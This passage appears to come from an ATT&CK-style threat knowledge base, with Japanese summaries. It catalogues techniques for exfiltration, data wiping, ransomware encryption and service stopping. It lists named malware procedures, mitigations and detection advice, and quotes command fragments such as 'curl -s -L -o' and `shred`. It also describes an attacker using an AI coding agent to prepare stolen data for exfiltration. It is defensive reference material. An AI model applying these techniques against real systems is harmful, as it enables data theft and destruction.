server over the same protocol as C2 communications. MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications. Misdat has uploaded files and data to its C2 servers. Mis-Type has transmitted collected files and data to its C2 server. S-Type has uploaded data and files from a compromised host to its C2 servers. ZLib has sent data and files from a compromised host to its C2 servers. Crimson can exfiltrate stolen information over its C2. Pteranodon exfiltrates screenshot files to its C2 server. Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server. Bandook can upload files from a victim's machine over the C2 channel. Proxysvc performs data exfiltration over the control server channel using a custom protocol. Bankshot exfiltrates data over its C2 channel. ROKRAT can send collected files back over same C2 channel. Zebrocy has exfiltrated data to the designated C2 server using HTTP POST requests. OopsIE can upload files from the victim's machine to its C2 server. TrickBot can send information about the compromised host and upload data to a hardcoded C2 server. Bisonal has added the exfiltrated data to the URL over the C2 channel. Octopus has uploaded stolen files and data from a victim's machine over its C2 channel. Cannon exfiltrates collected data over email via SMTP/S and POP3/S C2 channels. KONNI has sent data and files to its C2 server. Empire can send data gathered from a target through the command and control channel. Emotet has exfiltrated data over its C2 channel. Astaroth exfiltrates collected information from its r1.log file to the external C2 server. Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel. HOPLIGHT has used its C2 channel to exfiltrate data. Ebury exfiltrates a list of outbound and inbound SSH sessions using OpenSSH's `known_host` files and `wtmp` records. Ebury can exfiltrate SSH credentials through custom DNS queries or use the command `Xcat` to send the process's ssh session's credentials to the C2 server. FlawedAmmyy has sent data collected from a compromised host to its C2 servers. njRAT has used C2 infrastructure to receive stolen information from the infected machine including screenshots and other system information. Ursnif has used HTTP POSTs to exfil gathered information. HAWKBALL has sent system information and files over the C2 channel. LightNeuron exfiltrates data over its email C2 channel. Machete's collected data is exfiltrated over the same channel used for C2. PoetRAT has exfiltrated data over the C2 channel. HotCroissant has the ability to download files from the infected host to the command and control (C2) server. Imminent Monitor has uploaded a file containing debugger logs, network information and system information to the C2. Attor has exfiltrated data over the C2 channel. Data exfiltration is done by Okrum using the already opened channel with the C2 server. PowerShower has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days. ShimRatReporter sent generated reports to the C2 via HTTP POST requests. Lokibot has the ability to initiate contact with command and control (C2) to exfiltrate stolen data. Rising Sun can send data gathered from the infected machine via HTTP POST request to the C2. Metamorfo can send the data it collects to the C2 server. MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2. SDBbot has sent collected data from a compromised host to its C2 servers. TajMahal has the ability to send collected files over its C2. Valak has the ability to exfiltrate data over the C2 channel. Goopy has the ability to exfiltrate data over the Microsoft Outlook C2 channel. Carberp has exfiltrated data via HTTP to already established C2 servers. Kessel has exfiltrated information gathered from the infected system to the C2 server. StrongPity can exfiltrate collected documents through C2 channels. GoldenSpy has exfiltrated host environment information to an external C2 domain via port 9006. RDAT can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel. REvil can exfiltrate host and malware information to C2 servers. Drovorub can exfiltrate files over C2 infrastructure. BLINDINGCAN has sent user and system information to a C2 server via HTTP POST requests. KGH_SPY can exfiltrate collected information from the host to the C2 server. Grandoreiro can send data it retrieves to the C2 server. SLOTHFULMEDIA has sent system information to a C2 server via HTTP and HTTPS POST requests. Crutch can exfiltrate data over the primary C2 channel (Dropbox HTTP API). Spark has exfiltrated data over the C2 channel. EVILNUM can upload files over the C2 channel from the infected host. Caterpillar WebShell can upload files over the C2 channel. AppleJeus has exfiltrated collected host information to a C2 server. Penquin can execute the command code <code>do_upload</code> to send files to C2. GoldMax can exfiltrate files over the existing C2 channel. ThiefQuest exfiltrates targeted file extensions in the <code>/Users/</code> folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string. Doki has used Ngrok to establish C2 and exfiltrate data. Stuxnet sends compromised victim information via HTTP. Industroyer sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request. SideTwist has exfiltrated data over its C2 channel. SombRAT has uploaded collected data and files from a compromised host to its C2 server. AppleSeed can exfiltrate files via the C2 channel. GrimAgent has sent data related to a compromise host over its C2 channel. Sliver can exfiltrate files from the victim using the <code>download</code> command. SMOKEDHAM has exfiltrated data to its C2 server. QakBot can send stolen information to C2 nodes including passwords, accounts, and emails. BoxCaon uploads files and data from a compromised host over the existing C2 channel. MarkiRAT can exfiltrate locally stored data via its C2. BLUELIGHT has exfiltrated data over its C2 channel. XCSSET retrieves files that match the pattern defined in the INAME_QUERY variable within the user's home directory, such as `*test.txt`, and are below a specific size limit. It then archives the files and exfiltrates the data over its C2 channel. FoggyWeb can remotely exfiltrate sensitive information from a compromised AD FS server. SysUpdate has exfiltrated data over its C2 channel. Chrommme can exfiltrate collected data via C2. WarzoneRAT can send collected victim data to its C2 server. Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server. CharmPower can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST. Torisma can send victim data to an actor-controlled C2 server. LitePower can send collected data, including screenshots, over its C2 channel. Cyclops Blink has the ability to upload exfiltrated files to a C2 server. SILENTTRINITY can transfer files from an infected host to the C2 server. Flagpro has exfiltrated data to the C2 server. MacMa exfiltrates data from a supplied path over its C2 channel. OutSteel can upload files from a compromised host over its C2 channel. Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel. Kevin can send data from the victim host through a DNS C2 channel. DnsSystem can exfiltrate collected data to its C2 server. IceApple's Multi File Exfiltrator module can exfiltrate multiple files from a compromised host as an HTTP response over C2. CreepySnail can connect to C2 for data exfiltration. Amadey has sent victim data to its C2 servers. Mongall can upload files and information from a compromised host to its C2 server. AuTo Stealer can exfiltrate data over actor-controlled C2 servers via HTTP or TCP. Squirrelwaffle has exfiltrated victim data using HTTP POST requests to its C2 servers. PingPull has the ability to exfiltrate stolen victim data through its C2 channel. StrifeWater can send data and files from a compromised host to its C2 server. STARWHALE can exfiltrate collected data to its C2 servers. Bumblebee can send collected data in JSON format to C2. SUGARDUMP has sent stolen credentials and other data to its C2 server. FunnyDream can execute commands, including gathering user information, and send the results to C2. PcShare can upload files and information from a compromised host to its C2 servers. metaMain can upload collected files and data to its C2 server. Mafalda can send network system data and files to its C2 server. SVCReady can send collected data in JSON format to its C2 server. Woody RAT can exfiltrate files from an infected machine to its C2 server. KOPILUWAK has exfiltrated collected data to its C2 via POST requests. RotaJakiro sends device and other collected data back to the C2 using the established C2 channels over TCP. BADHATCH can exfiltrate data over the C2 channel. SharpDisco can load a plugin to exfiltrate stolen files to SMB shares also used in C2. NightClub can use SMTP and DNS for file exfiltration and C2. DarkGate uses existing command and control channels to retrieve captured cryptocurrency wallet credentials. Mispadu can sends the collected financial data to the C2 server. IPsec Helper exfiltrates specific files through its command and control framework. LunarMail can use email image attachments with embedded data for receiving C2 commands and data exfiltration. During the initial Pikabot command and control check-in, Pikabot will transmit collected system information encrypted using RC4. Raccoon Stealer uses existing HTTP-based command and control channels for exfiltration. CHIMNEYSWEEP can upload collected files to the command-and-control server. Cuckoo Stealer can send information about the targeted system to C2 including captured passwords, OS build, hostname, and username. Manjusaka data exfiltration takes place over HTTP channels. DUSTTRAP can exfiltrate collected data over C2 channels. Latrodectus can exfiltrate encrypted system information to the C2 server. Solar can send staged files to C2 for exfiltration. Mango can use its HTTP C2 channel for exfiltration. ODAgent can use an attacker-controlled OneDrive account to receive C2 commands and to exfiltrate files. OilBooster can use an actor-controlled OneDrive account for C2 communication and exfiltration. PowerExchange can exfiltrate files via its email C2 channel. ShrinkLocker will exfiltrate victim system information along with the encryption key via an HTTP POST. MagicRAT exfiltrates data via HTTP over existing command and control channels. StrelaStealer exfiltrates collected email credentials via HTTP POST to command and control servers. To exfiltrate data, LightSpy configures each module to send an obfuscated JSON blob to hardcoded URL endpoints or paths aligned to the module name. Line Dancer exfiltrates collected data via command and control channels. Line Runner utilizes HTTP to retrieve and exfiltrate information staged using Line Dancer. Troll Stealer exfiltrates collected information to its command and control infrastructure. TRANSLATEXT has exfiltrated collected credentials to the C2 server. Sagerunex encrypts collected system data then exfiltrates via existing command and control channels. Lumma Stealer has exfiltrated collected data over existing HTTP and HTTPS C2 channels. RedLine Stealer has sent victim data to its C2 server or RedLine panel server. InvisibleFerret has used HTTP communications to the “/Uploads” URI for file exfiltration. BeaverTail has exfiltrated data collected from victim devices to C2 servers. XORIndex Loader has exfiltrated victim data using HTTPS POST requests to its C2 servers. HexEval Loader has exfiltrated victim data using HTTPS POST requests to its C2 servers. HTTPTroy has exfiltrated encrypted data over the C2 channel using the `up <FILENAME>` command. Shai-Hulud has used POST to exfiltrate secrets from the victim environment to an attacker-controlled URL. PHASEJAM has the ability to exfiltrate data from the victim appliance. BRICKSTORM has uploaded files from the victim system to C2 servers. LODEINFO can exfiltrate collected credentials and browser cookies to the C2 server. AshTag has exfiltrated reconnaissance data on targeted systems to C2 servers. MuddyViper has uploaded files to the C2 server. Additionally, MuddyViper has the ability to upload the specified file in chunks with sleep time between each chunk. LAMEHUG can exfiltrate collected system information and documents to C2. 敵対者は、既存のC2チャネルとは異なるプロトコルでデータを持ち出すことがある。FTP・SMTP・HTTP/S・DNS等が使われうる。 Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 敵対者は、対称暗号化された非C2プロトコル上でデータを持ち出すことがある。Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 敵対者は、非対称暗号化された非C2プロトコル上でデータを持ち出すことがある。Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 敵対者は、暗号化されていない非C2プロトコル上でデータを持ち出すことがある。Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 DLPでデータの不正な持ち出しを検出・防止する。 代替プロトコル経由の持ち出しに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 TeamTNT has sent locally staged files with collected credentials to C2 servers using cURL. Play has used WinSCP to exfiltrate data to actor-controlled accounts. Hydraq connects to a predefined domain on port 443 to exfil gathered information. PoetRAT has used a .NET tool named dog.exe to exiltrate information over an e-mail account. Bundlore uses the <code>curl -s -L -o</code> command to exfiltrate archived data to a URL. FrameworkPOS can use DNS tunneling for exfiltration of credit card data. Chaes has exfiltrated its collected data from the infected machine to the C2, sometimes using the MIME protocol. Kobalos can exfiltrate credentials over the network via UDP. AADInternals can directly download cloud user data such as OneDrive files. 敵対者は、リムーバブルドライブなどの物理媒体を介してデータを持ち出そうとすることがある。エアギャップ環境などで用いられる。 Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems. 敵対者は、USB接続された物理デバイス経由でデータを持ち出そうとすることがある。Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems. ハードウェアの接続を制限し、不正な機器の導入を防ぐ。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 DLPでデータの不正な持ち出しを検出・防止する。 物理媒体経由の持ち出しに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、共有／同期やクラウド環境のバックアップ作成などを通じて、自身が管理する別のクラウドアカウントへデータを転送して持ち出すことがある。 Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service. アカウントの作成・権限・ライフサイクルを適切に管理する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 ソフトウェアを安全に構成し、悪用を防ぐ。 DLPでデータの不正な持ち出しを検出・防止する。 クラウドアカウントへのデータ転送に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 INC Ransom has used Megasync to exfiltrate data to the cloud. RedCurl has used cloud storage to exfiltrate data, in particular the megatools utilities were used to exfiltrate data to Mega, a file storage service. Storm-0501 has copied data from the victims environment to their own infrastructure leveraging AzCopy CLI. 敵対者は、主たるC2チャネルの代わりに、既存の正規外部Webサービスを用いてデータを持ち出すことがある。人気サービスは正常トラフィックに紛れやすい。 Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services. 敵対者は、C2経由ではなくコードリポジトリへデータを持ち出すことがある。Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection. 敵対者は、クラウドストレージサービスへデータを持ち出すことがある。Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet. 敵対者は、Pastebin等のテキスト保存サイトへデータを持ち出すことがある。Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information. 敵対者は、Webhookエンドポイントへデータを持ち出すことがある。Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server. Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello. When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. 危険なWebコンテンツへのアクセスを制限する。 DLPでデータの不正な持ち出しを検出・防止する。 Webサービス経由の持ち出しに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0017, APT41 used Cloudflare services for data exfiltration. During APT28 Nearest Neighbor Campaign, APT28 exfiltrated data over public-facing webservers – such as Google Drive. During Salesforce Data Exfiltration, threat actors exfiltrated data via legitimate Salesforce API communication channels including the Salesforce Data Loader application. During the Anthropic AI-orchestrated Campaign, the adversary utilized Claude Code to generate a detailed summary report of collected data, which is then reviewed and approved by the adversary prior to exfiltration of data over Claude. APT28 can exfiltrate data over Google Drive. Magic Hound has used the Telegram API `sendMessage` to relay data on compromised devices. BlackByte has used services such as `anonymfiles.com` and `file.io` to exfiltrate victim data. Contagious Interview has leveraged Telegram API to exfiltrate stolen data. ngrok has been used by threat actors to configure servers for data exfiltration. DropBook has used legitimate web services to exfiltrate data. AppleSeed has exfiltrated files using web services. SampleCheck5000 can use the Microsoft Office Exchange Web Services API to access an actor-controlled account and retrieve files for exfiltration. OilCheck can upload documents from compromised hosts to a shared Microsoft Office 365 Outlook email account for exfiltration. Exbyte exfiltrates collected data to online file hosting sites such as `Mega.co.nz`. InvisibleFerret has leveraged Telegram chat to upload stolen data using the Telegram API with a bot token. 敵対者は、システム上のデータやファイルを破壊し、可用性を損なうことがある。 Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives. Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure. 敵対者は、クラウドのライフサイクルポリシーを悪用してデータを自動削除させることがある。Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within. アカウントの作成・権限・ライフサイクルを適切に管理する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 データを定期的にバックアップし、破壊・暗号化からの復旧を可能にする。 データ破壊に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed CaddyWiper on the victim’s IT environment systems to wipe files related to the OT capabilities, along with mapped drives, and physical drive partitions. During the 2025 Poland Wiper Attacks, the adversaries utilized wiper malware to overwrite files using a 16-byte buffer that fully overwrites files 16 bytes or smaller or partially overwrites files greater than 16 bytes to speed up the process. Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory. Sandworm Team has used CaddyWiper, SDelete, and the BlackEnergy KillDisk component to overwrite files on victim systems. Additionally, Sandworm Team has used the JUNKMAIL tool to overwrite files with null bytes. APT38 has used a custom secure delete function to make deleted files unrecoverable. LAPSUS$ has deleted the target's systems and resources both on-premises and in the cloud. Storm-0501 has destroyed data and backup files. VOID MANTICORE has conducted data wiping attacks on compromised systems. VOID MANTICORE has also manually deleted files from compromised hosts, to include selecting all files and then deleting them. BlackEnergy 2 contains a "Destroy" plug-in that destroys data stored on victim hard drives by overwriting file contents. PowerDuke has a command to write random data across a file and delete it. Shamoon attempts to overwrite operating system files and disk structures with image files. In a later variant, randomly generated data was used for data overwrites. SDelete deletes data in a way that makes it unrecoverable. Proxysvc can overwrite files indicated by the attacker before deleting them. Kazuar can overwrite files with random data before deleting them. Xbash has destroyed Linux-based databases as part of its ransomware capabilities. RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data. Olympic Destroyer overwrites files locally and on remote shares. StoneDrill has a disk wiper module that targets files other than those in the Windows directory. REvil has the capability to destroy files and folders. Industroyer’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files. KillDisk deletes system files to make the OS unbootable. KillDisk also targets and deletes files with 35 different file extensions. Diavol can delete specified files from a targeted system. Meteor can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them. WhisperGate can corrupt files by overwriting the first 1 MB with `0xcc` and appending random extensions. CaddyWiper can work alphabetically through drives on a compromised system to take ownership of and overwrite all files. HermeticWiper can recursively wipe folders and files in `Windows`, `Program Files`, `Program Files(x86)`, `PerfLogs`, `Boot, System`, `Volume Information`, and `AppData` folders using `FSCTL_MOVE_FILE`. HermeticWiper can also overwrite symbolic links and big files in `My Documents` and on the Desktop with random bytes. AcidRain performs an in-depth wipe of the target filesystem and various attached storage devices through either a data overwrite or calling various IOCTLS to erase it. Apostle initially masqueraded as ransomware but actual functionality is a data destruction tool, supported by an internal name linked to an early version, <code>wiper-action</code>. Apostle writes random data to original files after an encrypted copy is created, along with resizing the original file to zero and changing time property metadata before finally deleting the original file. DEADWOOD overwrites files on victim systems with random data to effectively destroy them. MultiLayer Wiper deletes files on network drives, but corrupts and overwrites with random data files stored locally. AcidPour can perform an in-depth wipe of victim filesystems and attached storage devices through either data overwrite or calling various IOCTLS to erase them, similar to AcidRain. ShrinkLocker can initiate a destructive payload depending on the operating system check through resizing and reformatting portions of the victim machine's disk, leading to system instability and potential data corruption. Shai-Hulud has destroyed the victim’s home directory by overwriting and deleting every writable file within the user's home folder. Shai-Hulud has also utilized the `shred` command on Linux devices. SameCoin can overwrite designated files on targeted systems with random bytes. DynoWiper has overwritten files with 16-byte sequences of random data generated by the Mersenne Twister algorithm using the Microsoft Windows native `CreateFileW()` function to open the file and the `SetFilePointerEx()` and `WriteFile()` functions to overwrite the file. Additionally, versions of DynoWiper can also delete files using the `DeleteFileW` API. LazyWiper has overwritten files with pseudorandom 32‑byte sequences written at 16‑byte intervals making the file unrecoverable. 敵対者は、データを暗号化して利用不能にし、可用性を妨害することがある（ランサムウェア等）。 Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted. エンドポイントで悪意ある挙動を検出・防止する。 データを定期的にバックアップし、破壊・暗号化からの復旧を可能にする。 影響目的のデータ暗号化に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0015, the threat actors used Conti ransomware to encrypt a compromised network. During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network. During HomeLand Justice, threat actors used ROADSWEEP ransomware to encrypt files on targeted systems. During SharePoint ToolShell Exploitation, threat actors deployed ransomware including 4L4MD4R and Warlock. Sandworm Team has used Prestige ransomware to encrypt data at targeted organizations in transportation and related logistics industries in Ukraine and Poland. FIN7 has encrypted virtual disk volumes on ESXi servers using a version of Darkside ransomware. Additionally, FIN7 has deployed ransomware as the end payload during big game hunting. Magic Hound has used BitLocker and DiskCryptor to encrypt targeted workstations. FIN8 has deployed ransomware such as Ragnar Locker, White Rabbit, and attempted to execute Noberus on compromised networks. APT38 has used Hermes ransomware to encrypt files with AES256. TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment. APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user. APT41 also used Microsoft Bitlocker to encrypt workstations and Jetico’s BestCrypt to encrypt servers. Indrik Spider has encrypted domain-controlled systems using BitPaymer. Additionally, Indrik Spider used PsExec to execute a ransomware script. Scattered Spider has used BlackCat and DragonForce ransomware to encrypt files including on VMWare ESXi servers. Akira encrypts files in victim environments as part of ransomware operations. INC Ransom has used INC Ransomware to encrypt victim's data. Moonstone Sleet has deployed ransomware in victim environments. BlackByte has encrypted victim files for ransom. Early versions of BlackByte ransomware used a common key for encryption, but later versions use unique keys per victim. Storm-1811 is a financially-motivated entity linked to the deployment of Black Basta ransomware in victim environments. Water Galura has encrypted files on victim networks through the generation of Qilin ransomware payloads. Medusa Group has encrypted files using AES-256 encryption which then appends the file extension “.medusa” to encrypted files and leaves a ransomware note named “!READ_ME_MEDUSA!!!.txt.” Storm-0501 has encrypted files in victim environments using ransomware as a service (RaaS) including Sabbath, Hive, BlackCat, Hunters International, LockBit 3.0 and Embargo ransomware. VOID MANTICORE has utilized legitimate disk encryption utilities to increase likelihood of encrypting system drives and reduce system recovery efforts. Shamoon has an operational mode for encrypting data instead of overwriting it. SynAck encrypts the victims machine followed by asking the victim to pay a ransom. Xbash has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid. WannaCry encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files. NotPetya encrypts user files and disk structures like the MBR with 2048-bit RSA. SamSam encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files. LockerGoga has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key. JCry has encrypted files and demanded Bitcoin to decrypt those files. RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files. Ryuk has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory. Maze has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. Maze has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files. Netwalker can encrypt files on infected machines to extort victims. Ragnar Locker encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom. REvil can encrypt files on victim systems and demands a ransom to decrypt the files. Egregor can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note. Pay2Key can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption. BitPaymer can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending <code>.locked</code> to the filename. Conti can use <code>CreateIoCompletionPort()</code>, <code>PostQueuedCompletionStatus()</code>, and <code>GetQueuedCompletionPort()</code> to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. Conti can use “Windows Restart Manager” to ensure files are unlocked and open for encryption. MegaCortex has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process. Pysa has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions. ThiefQuest encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information. EKANS uses standard encryption library functions to encrypt files. Bad Rabbit has encrypted files and disks using AES-128-CBC and RSA-2048. KillDisk has a ransomware component that encrypts files with an AES key that is also RSA-1028 encrypted. Clop can encrypt files using AES, RSA, and RC4 and will add the ".clop" extension to encrypted files. WastedLocker can encrypt data and leave a ransom note. DEATHRANSOM can use public and private key pair encryption to encrypt files for ransom payment. HELLOKITTY can use an embedded RSA-2048 public key to encrypt victim data for ransom. FIVEHANDS can use an embedded NTRU public key to encrypt data for ransom. Cuba has the ability to encrypt system data and add the ".cuba" extension to encrypted files. Babuk can use ChaCha8 and ECDH to encrypt data. Seth-Locker can encrypt files on a targeted system, appending them with the suffix .seth. Avaddon encrypts the victim system using a combination of AES256 and RSA encryption schemes. ProLock can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024. XCSSET performs AES-CBC encryption on files under <code>~/Documents</code>, <code>~/Downloads</code>, and <code>~/Desktop</code> with a fixed key and renames files to give them a <code>.enc</code> extension. Only files with sizes less than 500MB are encrypted. Diavol has encrypted files using an RSA key though the `CryptEncrypt` API and has appended filenames with ".lock64". DCSrv has encrypted drives using the core encryption mechanism from DiskCryptor. AvosLocker has encrypted files and network resources using AES-256 and added an `.avos`, `.avos2`, or `.AvosLinux` extension to filenames. Prestige has leveraged the CryptoPP C++ library to encrypt files on target systems using AES and appended filenames with `.enc`. BlackCat has the ability to encrypt Windows devices, Linux devices, and VMWare instances. Black Basta can encrypt files with the ChaCha20 cypher and using a multithreaded process to increase speed. Black Basta has also encrypted files while the victim system is in safe mode, appending `.basta` upon completion. Royal uses a multi-threaded encryption process that can partially encrypt targeted files with the OpenSSL library and the AES256 algorithm. Cheerscrypt can encrypt data on victim machines using a Sosemanuk stream cipher with an Elliptic-curve Diffie–Hellman (ECDH) generated key. DarkGate can deploy follow-on ransomware payloads. Akira can encrypt victim filesystems for financial extortion purposes including through the use of the ChaCha20 and ChaCha8 stream ciphers. Apostle creates new, encrypted versions of files then deletes the originals, with the new filenames consisting of a random GUID and ".lock" for an extension. Moneybird targets a common set of file types such as documents, certificates, and database files for encryption while avoiding executable, dynamic linked libraries, and similar items. INC Ransomware can encrypt data on victim systems, including through the use of partial encryption and multi-threading to speed encryption. ROADSWEEP can RC4 encrypt content in blocks on targeted systems. Playcrypt encrypts files on targeted hosts with an AES-RSA hybrid encryption, encrypting every other file portion of 0x100000 bytes. ShrinkLocker uses the legitimate BitLocker application to encrypt victim files for ransom. BlackByte Ransomware is ransomware using a shared key across victims for encryption. BlackByte 2.0 Ransomware is a ransomware variant associated with BlackByte operations. Megazord can encrypt files on targeted Windows hosts leaving them with a ".powerranges" file extension. The Akira _v2 encryptor targets the `/vmfs/volumes/` path by default and can use the rust-crypto 0.2.36 library crate for the encryption processes. LockBit 2.0 can use standard AES and elliptic-curve cryptography algorithms to encrypt victim data. LockBit 3.0 can encrypt targeted data using the AES-256, ChaCha20, or RSA-2048 algorithms. RansomHub can use Elliptic Curve Encryption to encrypt files on targeted systems. RansomHub can also skip content at regular intervals (ex. encrypt 1 MB, skip 3 MB) to optomize performance and enable faster encryption for large files. Qilin can use AES-256 or ChaCha20 for domain-wide encryption of victim servers and workstations and RSA-4096 or RSA-2048 to secure generated encryption keys. Medusa Ransomware has encrypted files using AES-256 encryption, which then appends the file extension “.medusa” to encrypted files and leaves a ransomware note named “!READ_ME_MEDUSA!!!.txt.” Embargo has the ability to encrypt files with the ChaCha20 and Curve25519 cryptographic algorithms. Embargo also has the ability to encrypt system data and add a random six-letter extension consisting of hexadecimal characters such as ".b58eeb" or “.3d828a” to encrypted files. LODEINFO can incorporate a ransom command to encrypt specified files and folders. 敵対者は、システム上のサービスを停止・無効化して可用性を損なうことがある。 Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 ネットワークを分割し、横展開や影響範囲を限定する。 帯域外の通信チャネルを確保し、主系の侵害時にも対応できるようにする。 サービス停止に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users. Sandworm Team attempts to stop the MSSQL Windows service to ensure successful encryption of locked files. Kimsuky has disabled actively running virtual environments using the `KillMe` function to include VMware, Microsoft Hypervisors, and VirtualBox. Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption. Indrik Spider has used PsExec to stop services prior to the execution of ransomware. LAPSUS$ has shut down virtual machines from within a victim's on-premise VMware ESXi infrastructure. Medusa Group has terminated services related to 